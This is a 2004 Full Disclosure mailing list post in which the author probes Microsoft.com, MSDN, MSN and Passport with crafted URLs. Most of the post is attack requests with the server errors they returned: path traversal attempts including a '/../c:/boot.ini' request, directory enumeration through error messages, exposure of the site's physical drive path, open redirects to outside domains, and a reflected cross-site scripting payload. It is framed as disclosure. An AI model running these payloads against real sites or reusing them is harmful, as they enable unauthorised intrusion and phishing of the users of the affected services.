Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

[Bug Proofing Microsoft.com with Internet Explorer ** Part I **]
From: Vizzy <vizzy () freemail hu>
Date: Tue, 16 Mar 2004 03:47:10 +0000


===[Bug Proofing Microsoft.com with Internet Explorer ]===

Disclaimer: All information contained here based on the author's wild imagination
            and all real coincidences are accidental.
            Provided for educational purposes only.
            Also, be aware that Microsoft site most likely won't explode
            (too good to be true, see Part II), your IE easily could.


Introduction:

So, where are we going today? All roads lead to www.microsoft.com, the powerful home of most
secure operation system. Ever.

But should THE SITE be the tightest one to demonstrate us the
powerfull feeling of security and happines? Or is it Ok to have glitch
or two unless someone notices?

So -- who cares? The company, whos security profile is the security of their operation systems.
Security of our homes (Hopefully we don't live in M$ boxes all of us).

Ok, enough talking, let's see what we can phish with our handy browser..

Before we start, point your browsers to
http://www.microsoft.com/isapi/gomscom.asp
to remind yourself how Microsoft site looked like back in 1997,
when Microsoft had no chances to hire some good web designers, because
the most insecure and unstable but pretensions operation system was just
going to be released..


=============[* Part I: Bogus URL's:]=================================

*********
**URL 1**
*********

Browsing MSDN I came across following URL:

http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winsock/winsock/winsock_functions.asp

Page uses frames and one of them contains "library/en-us/winsock/winsock/winsock_functions.asp"
Ok, let's play with url a bit:
http://msdn.microsoft.com/library/default.asp?url=/library/../library/en-us/winsock/winsock/winsock_functions.asp
Returns us the same page. Same result. Can we change folders?..

Trying to guess parent folder name:
http://msdn.microsoft.com/library/default.asp?url=/library/../../msdn/library/en-us/winsock/winsock/winsock_functions.asp
Page not found
http://msdn.microsoft.com/library/default.asp?url=/library/../../wwwroot/library/en-us/winsock/winsock/winsock_functions.asp
Page not found

Ok.. no luck.. but how about:
http://msdn.microsoft.com/library/default.asp?url=/../c:/library/en-us/winsock/winsock/winsock_functions.asp
The system cannot find the file specified.

Hmm..

http://msdn.microsoft.com/library/default.asp?url=/../c:/boot.ini
The system cannot find the file specified.
This looks like Windows error message!
Why? It's not here?:O

I would be surprised if it was..
Tried some other default names but without luck.
Let's leave this URL for now as I found better:


*********
**URL 2**
*********


http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=

let's play a bit with 'dtcfg' parameter:

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=..
msxml3.dll error '80070005'
Access is denied.
/library/shared/deeptree/asp/contentbar.asp, line 12

Hmm.. Interesting.

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=";
Server.MapPath() error 'ASP 0173 : 80004005'
Invalid Path Character
/library/shared/deeptree/asp/contentbar.asp, line 12
An invalid character was specified in the Path parameter for the MapPath method.

Nice. So we control input for Server.MapPath() function, but what is it and
what it does?
Google answers: Function takes one argument, a virtual path, and returns the
corresponding physical path.

Right:
http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=c:\
Server.MapPath() error 'ASP 0172 : 80004005'
Invalid Path
/library/shared/deeptree/asp/contentbar.asp, line 12
The Path parameter for the MapPath method must be a virtual path. A physical path was used.

Just to be sure.

Ok, our perspective?

It looks like we dealing with something like:
lala.ReadXml(Server.MapPath("$dtcfg"));

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=..\..\..\
msxml3.dll error '80070005'
Access is denied.
/library/shared/deeptree/asp/contentbar.asp, line 12

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=..\..\..\..\..\
Microsoft JScript runtime error '800a138f'
'oXDoc.documentElement' is null or not an object
/library/shared/deeptree/asp/contentbar.asp, line 40

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=..\..\..\..\..\..\
Server.MapPath() error 'ASP 0176 : 80004005'
Path Not Found
/library/shared/deeptree/asp/contentbar.asp, line 12
The Path parameter for the MapPath method did not correspond to a known path.

Looks like we are 5 levels deep from root directory.

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/../../http/library/shared/searchtab/cnfg.xml

OK, leaving it..

*********
**URL 3**
*********

http://www.microsoft.com/library/shared/searchtab/search.asp

Sneaking into source:

<FORM id="frmSearch2" target="_top"  name="frmSearch2" action="/library/shared/searchtab/searchHandoff.asp" 
method="get">
<INPUT TYPE="HIDDEN" name="handoffurl" value="http://search.microsoft.com/us/dev/default.asp";>
<INPUT TYPE="HIDDEN" name="stcfg" value="d:/http/library/shared/searchtab/cnfg.xml">
                                        ^^^^^^ oops!
      
So it looks like great site of Microsoft is hosted on drive D:!
But -- lets try to verify that..

One of the known to us before pages.. With existed xml file name it is:
http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/shared/searchtab/cnfg.xml
Shows us nice skyblue screen.

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/../library/shared/searchtab/cnfg.xml
Ok, browsing works..

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/../../http/library/shared/searchtab/cnfg.xml
Works again! So it is indeed located in "HTTP" parent folder.

To be 100% sure, let's try non-existent name and see what happens:
http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/../../hxxp/library/shared/searchtab/cnfg.xml
Microsoft JScript runtime error '800a138f'
'oXDoc.documentElement' is null or not an object
/library/shared/deeptree/asp/contentbar.asp, line 40
Yeah, our assumptions were right.

/*
As it appeared later, there are plenty places where physical path is exposed. Like:
 <INPUT TYPE="HIDDEN" name="stcfg" value="d:/http/mscorp/worldwide/spanish/msdn/cnfg.xml">
*/

Now we can use this URL to probe folders in root web folder:

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/../http/help/
Microsoft JScript runtime error '800a138f'
'oXDoc.documentElement' is null or not an object
/library/shared/deeptree/asp/contentbar.asp, line 40
Folder does not exist.

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/../http/info/
msxml3.dll error '80070005'
Access is denied.
/library/shared/deeptree/asp/contentbar.asp, line 12
Folder exist.


.... etc


http://www.microsoft.com/library/shared/searchtab/searchHandoff.asp?handoffurl=http://ddd.com/ddd.asp&stcfg=default.asp&qu=123&btnSearch=GO
strScopeId1
sltSearchListundefined
Microsoft JScript runtime error '800a01a8'
Object required
/library/shared/searchtab/searchHandoff.asp, line 90



*********
**URL 4**
*********

"Can anybody tell me where am I?"


Are we at Microsoft.com or what?
http://msdn.microsoft.com/vcsharp/default.aspx?pull=%68%74%74%70%3a%2f%2f%66%75%63%6b%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d
http://help.msn.com/EN_US/external.asp?topic=%67%6f%6f%67%6c%65%2e%63%6f%6d

I thought I downloaded security update from M$?! (R)


Now, how about securely signing-up to your Passport?
https://www.passport.net/cobrand2.asp?cbru=%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d


Oh, well.. and last, but not least..

lets get some Javascript run on Microsoft site:
http://www.microsoft.com/norge/news/archive.asp?y=1997%3Cscript%3Ealert('Its%20warmer%20in%20here..:)');%3C/script%3E%3C!--





    *** with more critical bugs...
              to be continued in Part II: .......


    
-- 
have phun,
 Vizzy    

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
  • [Bug Proofing Microsoft.com with Internet Explorer ** Part I **] Vizzy (Mar 16)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]